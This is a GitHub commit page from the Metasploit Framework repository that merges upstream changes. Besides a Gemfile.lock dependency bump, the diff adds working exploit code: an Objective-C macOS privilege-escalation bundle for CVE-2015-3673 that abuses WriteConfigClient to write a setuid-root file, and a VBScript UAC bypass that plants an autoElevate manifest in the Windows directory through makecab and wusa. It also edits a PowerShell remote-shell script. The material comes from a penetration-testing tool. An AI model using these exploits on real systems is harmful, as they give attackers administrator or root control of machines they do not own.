Merge branch 'upstream-master' into land-5890-android-post-api

rapid7 · Sep 3, 2015 · 70b5336 · 70b5336
2 parents ccd0a06 + 895b692
commit 70b5336
Show file tree

Hide file tree

Showing 254 changed files with 6,383 additions and 6,390 deletions.
diff --git a/Gemfile.lock b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (= 1.0.0)
       metasploit-model (= 1.0.0)
-      metasploit-payloads (= 1.0.8)
+      metasploit-payloads (= 1.0.11)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.8)
+    metasploit-payloads (1.0.11)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
@@ -135,7 +135,7 @@ GEM
       railties (>= 4.0.9, < 4.1.0)
       recog (~> 2.0)
     method_source (0.8.2)
-    mime-types (2.4.3)
+    mime-types (2.6.1)
     mini_portile (0.6.2)
     minitest (4.7.5)
     msgpack (0.6.2)

diff --git a/data/exploits/CVE-2015-0016/cve-2015-0016.dll b/data/exploits/CVE-2015-0016/cve-2015-0016.dll
diff --git a/data/exploits/CVE-2015-3673/exploit.daplug b/data/exploits/CVE-2015-3673/exploit.daplug
diff --git a/data/exploits/CVE-2015-3673/exploit.m b/data/exploits/CVE-2015-3673/exploit.m
@@ -0,0 +1,33 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+    if (p != NULL)
+    {
+        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+        NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+                     data,
+                     outpath,
+                     @{ NSFilePosixPermissions : @04777 });
+    }
+
+    exit(1);
+}
diff --git a/data/exploits/powershell/powerfun.ps1 b/data/exploits/powershell/powerfun.ps1
@@ -36,7 +36,7 @@ function powerfun
         $stream = $sslStream 
     }
 
-    [byte[]]$bytes = 0..255|%{0}
+    [byte[]]$bytes = 0..20000|%{0}
     $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
     $stream.Write($sendbytes,0,$sendbytes.Length)
 

diff --git a/data/exploits/scripthost_uac_bypass/bypass.vbs b/data/exploits/scripthost_uac_bypass/bypass.vbs
@@ -0,0 +1,62 @@
+Option Explicit
+
+Dim oWs: Set oWs = CreateObject("WScript.Shell")
+Dim oFso: Set oFso = CreateObject("Scripting.FileSystemObject")
+Dim HOST_MANIFEST: HOST_MANIFEST = _
+    "<?xml version=""1.0"" encoding=""UTF-8"" standalone=""yes""?>" & vbCrLf & _
+    "<assembly xmlns=""urn:schemas-microsoft-com:asm.v1""" & vbCrLf & _
+    "          xmlns:asmv3=""urn:schemas-microsoft-com:asm.v3""" & vbCrLf & _
+    "          manifestVersion=""1.0"">" & vbCrLf & _
+    "  <asmv3:trustInfo>" & vbCrLf & _
+    "    <security>" & vbCrLf & _
+    "      <requestedPrivileges>" & vbCrLf & _
+    "        <requestedExecutionLevel level=""RequireAdministrator"" uiAccess=""false""/>" & vbCrLf & _
+    "      </requestedPrivileges>" & vbCrLf & _
+    "    </security>" & vbCrLf & _
+    "  </asmv3:trustInfo>" & vbCrLf & _
+    "  <asmv3:application>" & vbCrLf & _
+    "    <asmv3:windowsSettings xmlns=""http://schemas.microsoft.com/SMI/2005/WindowsSettings"">" & vbCrLf & _
+    "      <autoElevate>true</autoElevate>" & vbCrLf & _
+    "      <dpiAware>true</dpiAware>" & vbCrLf & _
+    "    </asmv3:windowsSettings>" & vbCrLf & _
+    "  </asmv3:application>" & vbCrLf & _
+    "</assembly>"
+
+
+Sub Copy(ByVal sSource, ByVal sTarget)
+    Dim sTempFile: sTempFile = GetTempFilename()
+    oWs.Run "makecab """ & sSource & """ """ & sTempFile & """", 0, True
+    oWs.Run "wusa """ & sTempFile & """ /extract:" & sTarget, 0, True
+    oFso.DeleteFile sTempFile
+End Sub
+
+Sub Elevate()
+    Const WINDIR = "%windir%"
+    Dim sPath: sPath = Left(WScript.ScriptFullName, _
+                            InStrRev(WScript.ScriptFullName, "\"))
+    Dim sHost: sHost = Right(WScript.FullName, 11)
+    Dim sManifest: sManifest = sPath & sHost & ".manifest"
+    Dim oStream: Set oStream = oFso.CreateTextFile(sManifest)
+    oStream.Write HOST_MANIFEST
+    oStream.Close
+    Copy sManifest, WINDIR
+    Copy WScript.FullName, WINDIR
+    oWs.Run WINDIR & "\" & sHost & " """ & WScript.ScriptFullName & """ /RESTART"
+    oFso.DeleteFile sManifest
+End Sub
+
+Function GetTempFilename()
+    Const vbTemporaryFolder = 2
+    Dim sTempFolder: sTempFolder = oFso.GetSpecialFolder(vbTemporaryFolder)
+    GetTempFilename = oFso.BuildPath(sTempFolder, oFso.GetTempName())
+End Function
+
+Sub RunAsAdmin()
+  oWs.Run "COMMAND"
+End Sub
+
+If WScript.Arguments.Named.Exists("RESTART") Then
+    RunAsAdmin
+Else
+    Elevate
+End If